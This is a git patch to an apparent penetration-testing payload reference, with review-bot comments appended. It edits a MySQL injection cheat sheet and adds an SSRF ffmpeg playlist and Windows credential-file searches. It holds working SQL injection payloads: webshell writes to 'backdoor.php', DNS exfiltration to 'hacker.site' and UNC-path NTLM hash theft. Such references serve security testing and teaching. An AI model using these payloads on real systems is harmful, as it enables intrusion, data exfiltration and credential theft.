From c66197903f7390b6830ce7a813925d295381c0fb Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 14 Apr 2019 19:46:34 +0200 Subject: [PATCH] MYSQL Truncation attack + Windows search where --- .../Linux - Persistence.md | 2 +- .../Windows - Privilege Escalation.md | 2 + SQL Injection/MySQL Injection.md | 54 +++++++++++++++---- SQL Injection/README.md | 6 +++ .../Files/ssrf_ffmpeg.avi | 5 ++ Server Side Request Forgery/README.md | 1 + .../Files/SSRF_expect.svg | 3 ++ .../Files/SSRF_url.svg | 3 ++ 8 files changed, 65 insertions(+), 11 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_ffmpeg.avi create mode 100644 Server Side Template Injection/Files/SSRF_expect.svg create mode 100644 Server Side Template Injection/Files/SSRF_url.svg diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index b5895ac..a80c802 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -50,7 +50,7 @@ sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart ## Backdooring an user startup file -Linux, write a file in `~/.config/autostart/NOM_OF_FILE.desktop` +Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` ```powershell In : ~/.config/autostart/*.desktop diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index b63bae5..8c751b6 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -200,6 +200,8 @@ findstr /spin "password" *.* ```powershell dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +where /R C:\ user.txt +where /R C:\ *.ini ``` ### Search the registry for key names and passwords diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index cf4f672..3677441 100644 --- a/SQL Injection/MySQL Injection.md 
+++ b/SQL Injection/MySQL Injection.md @@ -1,6 +1,32 @@ # MYSQL Injection -## MYSQL +## Summary + +* [MYSQL Comment](#mysql-comment) +* [Detect columns number](#detect-columns-number) +* [MYSQL Union Based](#mysql-union-based) + * [Extract database with information_schema](#extract-database-with-information-schema) + * [Extract data without information_schema](#extract-data-without-information-schema) + * [Extract data without columns name](#extract-data-without-columns-name) +* [MYSQL Error Based - Basic](#mysql-error-based---basic) +* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function) +* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function) +* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) +* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) +* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) +* [MYSQL Blind with LIKE](#mysql-blind-with-like) +* [MYSQL Time Based](#mysql-time-based) +* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) +* [MYSQL Read content of a file](#mysql-read-content-of-a-file) +* [MYSQL Write a shell](#mysql-write-a-shell) +* [MYSQL Truncation](#mysql-truncation) +* [MYSQL Out of band](#mysql-out-of-band) + * [DNS exfiltration](#dns-exfiltration) + * [UNC Path - NTLM hash stealing](#unc-path---ntlm-hash-stealing) +* [References](#references) + + +## MYSQL comment ```sql # MYSQL Comment @@ -9,9 +35,12 @@ /*!32302 10*/ Comment for MYSQL version 3.23.02 ``` -## Detect columns number -Using a simple ORDER +## MYSQL Union Based + +### Extract database with information_schema + +First you need to know the number of columns, you can use `order by`. ```sql order by 1 
@@ -21,7 +50,7 @@ order by 3 order by XXX ``` -## MYSQL Union Based +Then the following codes will extract the databases'name, tables'name, columns'name. ```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata @@ -59,7 +88,7 @@ Method for `MySQL 5` ... ``` -### Extract data without information_schema +### Extract data without columns name Extracting data from the 4th column without knowing its name. @@ -154,7 +183,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO" into outfile "C:\\xampp\\htdocs\\backdoor.php" @@ -202,6 +231,10 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` +## MYSQL Truncation + +In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed. + ## MYSQL Out of band ```powershell @@ -209,14 +242,14 @@ select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'; select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt ``` -DNS exfiltration +### DNS exfiltration ```sql select load_file(concat('\\\\',version(),'.hacker.site\\a.txt')); select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)) ``` -UNC Path - NTLM hash stealing +### UNC Path - NTLM hash stealing ```sql select load_file('\\\\error\\abc'); 
@@ -230,4 +263,5 @@ load data infile '\\\\error\\abc' into table database.table_name; - [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf) - [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/) -- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) \ No newline at end of file +- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) +- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) \ No newline at end of file diff --git a/SQL Injection/README.md b/SQL Injection/README.md index a831e98..b7f8f77 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -169,6 +169,12 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5 ``` +### Using a proxy with SQLmap + +```powershell +sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080" +``` + ### Using Chrome cookie and a Proxy ```powershell diff --git a/Server Side Request Forgery/Files/ssrf_ffmpeg.avi b/Server Side Request Forgery/Files/ssrf_ffmpeg.avi new file mode 100644 index 0000000..a9f2708 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_ffmpeg.avi @@ -0,0 +1,5 @@ +#EXTM3U +#EXT-X-MEDIA-SEQUENCE:0 +#EXTINF:1.0 +http://ssrfevil.com +#EXT-X-ENDLIST \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b48ff94..d249403 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -512,3 +512,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) +- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) \ No newline at end of file diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Template Injection/Files/SSRF_expect.svg new file mode 100644 index 0000000..bb53257 --- /dev/null +++ b/Server Side Template Injection/Files/SSRF_expect.svg @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Template Injection/Files/SSRF_url.svg new file mode 100644 index 0000000..3252781 --- /dev/null +++ b/Server Side Template Injection/Files/SSRF_url.svg @@ -0,0 +1,3 @@ + + + \ No newline at end of file
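Review bot: the `Linux - Persistence.md` hunk fixes `NOM_OF_FILE` but leaves the fence right below it tagged ```` ```powershell ```` for a Linux `~/.config/autostart/*.desktop` file; an `ini` or plain fence would render correctly and not mislead readers. The context heading `## Backdooring an user startup file` also reads better as `a user`.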
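Review bot: the two `where /R C:\ ...` lines added to `Windows - Privilege Escalation.md` come with no explanation of what they are for, unlike the `findstr` and `dir` lines around them. A short comment line such as `:: recursive search of the whole drive, slow and noisy` would help, and `user.txt` looks like a CTF-specific filename that readers of a general privilege-escalation page will not know to adapt.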
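Review bot: the new Summary in `MySQL Injection.md` (`@@ -1,6 +1,32 @@`) links to headings that no longer exist or whose anchors are wrong. `* [Detect columns number](#detect-columns-number)` points at the `## Detect columns number` heading that this same hunk deletes, so the link is dead. GitHub keeps underscores in heading slugs, so `#extract-database-with-information-schema`, `#extract-data-without-information-schema` and `#mysql-blind-with-make-set` should be `#extract-database-with-information_schema`, `#extract-data-without-information_schema` and `#mysql-blind-with-make_set` to match the `information_schema` and `MAKE_SET` headings.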
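Review bot: the replacement sentence in `@@ -21,7 +50,7 @@`, `Then the following codes will extract the databases'name, tables'name, columns'name.`, has apostrophe and number errors; suggest `The following queries then extract the database names, table names and column names.` Since this hunk also removes the `## MYSQL Union Based` heading from this spot, confirm the `UniOn Select ...` block still sits under the heading added earlier in the file.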
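Review bot: the renamed heading in `@@ -59,7 +88,7 @@`, `### Extract data without columns name`, should read `### Extract data without column names` (the Summary anchor would then become `#extract-data-without-column-names`). Check that a `### Extract data without information_schema` heading still exists above the `Method for MySQL 5` block, since the Summary lists both sections and this hunk renames one of them.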
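Review bot: the new `## MYSQL Truncation` section (`@@ -202,6 +231,10 @@`) merges two separate MySQL behaviours and omits the condition under which the second one applies. That `admin ` and `admin` compare equal is a collation property (PAD SPACE collations ignore trailing spaces in comparisons); the silent cut to the column length on INSERT only happens when `sql_mode` does not include `STRICT_TRANS_TABLES` or `STRICT_ALL_TABLES`, which has been part of the default `sql_mode` since MySQL 5.7, and in strict mode the overflowing non-space character raises `Data too long for column` instead. Suggest stating that the description applies to non-strict mode and naming the mitigations: enable strict mode and enforce the length limit in the application before the INSERT. Also `In MYSQL` and `the database has a column-limit` read better as `In MySQL` and `the column has a length limit`.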
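Review bot: in `@@ -209,14 +242,14 @@`, while the `DNS exfiltration` and `UNC Path - NTLM hash stealing` labels are being promoted to `###` headings, the context line just above them, `select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt`, is missing its closing quote and semicolon; worth fixing in the same change.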
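Review bot: the references hunk in `@@ -230,4 +263,5 @@` adds the `SQL Truncation Attack - Warlock` entry but the file still ends with `\ No newline at end of file`; add a trailing newline so the next appended reference does not produce the same two-line diff for a one-line change.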
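Review bot: the new file `Server Side Request Forgery/Files/ssrf_ffmpeg.avi` is an HLS playlist (`#EXTM3U` ... `#EXT-X-ENDLIST`) saved with an `.avi` extension, and nothing in this patch explains it: the `Server Side Request Forgery/README.md` hunk only adds a reference link. Add a sentence in the README describing what the file is and how the extension mismatch relates to the ffmpeg case, and replace `http://ssrfevil.com` with an obvious placeholder such as `http://<your-listener>` so readers do not send traffic to a real domain.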
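Review bot: `SSRF_expect.svg` and `SSRF_url.svg` are created under `Server Side Template Injection/Files/`, but their names and the commit subject say they belong to the Server Side Request Forgery directory alongside `ssrf_ffmpeg.avi`. As shown here each file's three added lines are empty and no README references them, so either the content was lost before commit or the files need a README entry; please check both before merging.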